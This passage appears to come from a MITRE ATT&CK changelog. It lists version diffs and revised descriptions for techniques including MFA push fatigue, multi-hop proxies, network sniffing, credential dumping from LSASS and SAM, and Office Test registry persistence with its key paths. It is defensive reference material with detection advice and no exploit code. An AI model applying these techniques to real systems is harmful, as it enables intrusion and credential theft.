description (old value): Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site) Masquerading may also include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

description (new value): Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names. Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)

x_mitre_version | 1.6 | 1.7

[T1556] Modify Authentication Process

Current version: 2.4

Version changed from: 2.3 → 2.4

New Detections:

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-11 03:17:32.211000+00:00 | 2024-04-11 21:51:44.851000+00:00
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 2.3 | 2.4
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | (none) | Cloud Service: Cloud Service Modification

[T1556.006] Modify Authentication Process: Multi-Factor Authentication

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX Field: Old value → New Value
modified: 2023-10-16 16:47:26.119000+00:00 → 2024-04-16 00:20:21.488000+00:00
x_mitre_version: 1.1 → 1.2
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: Application Log: Application Log Content

[T1621] Multi-Factor Authentication Request Generation

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)

New Description
Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
Details
values_changed
STIX Field: Old value → New Value
modified: 2023-04-04 03:06:34.448000+00:00 → 2024-04-19 04:26:29.365000+00:00
description
Old value: Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
New Value: Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023) In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New Value
external_references: {'source_name': 'Obsidian SSPR Abuse 2023', 'description': 'Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.', 'url': 'https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/'}
x_mitre_contributors: Obsidian Security

[T1090.003] Proxy: Multi-hop Proxy

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description
To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise.

By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes.

This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network.

This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.

New Description
Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.

For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)

In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).

Protocols such as ICMP may be used as a transport.

Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors: ['Eduardo Chavarro Ovalle']
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2020-10-21 17:54:28.280000+00:00 → 2024-04-19 13:24:36.872000+00:00
description
Old value: To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing) In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.
New Value: Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing) In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport. Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
x_mitre_version: 2.0 → 2.1
iterable_item_added
STIX Field: New Value
external_references: {'source_name': 'NGLite Trojan', 'description': 'Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.', 'url': 'https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/'}

[T1564.004] Hide Artifacts: NTFS File Attributes

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2020-03-29 22:46:56.308000+00:00 → 2024-02-14 21:56:34.831000+00:00
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New Value
x_mitre_data_sources: Process: Process Creation

[T1040] Network Sniffing

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description
Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)

On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)

New Description
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)

On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
Details
values_changed
STIX Field: Old value → New Value
modified: 2023-07-10 15:48:01.560000+00:00 → 2024-04-19 12:32:44.370000+00:00
description
Old value: Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
New Value: Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary. Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment. In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring) On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.5 → 1.6
iterable_item_added
STIX Field: New Value
x_mitre_contributors: Eliraz Levi, Hunters

[T1003] OS Credential Dumping

Current version: 2.2

Version changed from: 2.1 → 2.2


Old Description
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

New Description
Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

New Detections:

Details
dictionary_item_added
STIX Field: New Value
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['Administrator', 'SYSTEM', 'root']
values_changed
STIX Field: Old value → New Value
modified: 2022-03-08 21:00:53.436000+00:00 → 2024-04-18 23:47:41.667000+00:00
description
Old value: Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
New Value: Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
x_mitre_detection
Old value:
### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity. Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc//maps, where the directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
New Value:
### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity. Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process. Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis. Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc//maps`, where the `` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
x_mitre_version: 2.1 → 2.2
iterable_item_added
STIX Field: New Value
external_references: {'source_name': 'Brining MimiKatz to Unix', 'description': 'Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.', 'url': 'https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf'}
x_mitre_contributors: Tim (Wadhwa-)Brown
x_mitre_contributors: Yves Yonan
x_mitre_data_sources: File: File Creation

[T1027] Obfuscated Files or Information

Current version: 1.6

Version changed from: 1.5 → 1.6

Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-08-28 19:17:53.015000+00:00 | 2024-04-16 12:27:18.945000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.5 | 1.6 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_platforms | | Network |

[T1137.002] Office Application Startup: Office Test

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature:

* `HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf`
* `HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf`

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.

New Description:

Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)

There exist user and global Registry keys for the Office Test feature, such as:

* `HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf`
* `HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf`

Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.
Details
dictionary_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |

dictionary_item_removed

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
| x_mitre_system_requirements | ['Office 2007, 2010, 2013, and 2016'] | |

values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2021-08-16 21:35:17.618000+00:00 | 2024-04-16 12:41:55.175000+00:00 |
| description | Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature: * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. | Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) There exist user and global Registry keys for the Office Test feature, such as: * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. |
| x_mitre_version | 1.1 | 1.2 |

[T1110.003] Brute Force: Password Spraying

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-10-16 16:55:18.014000+00:00 | 2024-03-07 14:33:34.201000+00:00 |
| x_mitre_version | 1.4 | 1.5 |

iterable_item_added

| STIX Field | Old value | New Value |
|---|---|---|
| x_mitre_platforms | | Network |

[T1566] Phishing

Current version: 2.5

Version changed from: 2.4 → 2.5

New Mitigations:

Details
values_changed

| STIX Field | Old value | New Value |
|---|---|---|
| modified | 2023-09-08 20:27:52.947000+00:00 | 2024-03-01 16:56:32.245000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 2.4 | 2.5 |

[T1547.010] Boot or Logon Autostart Execution: Port Monitors

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

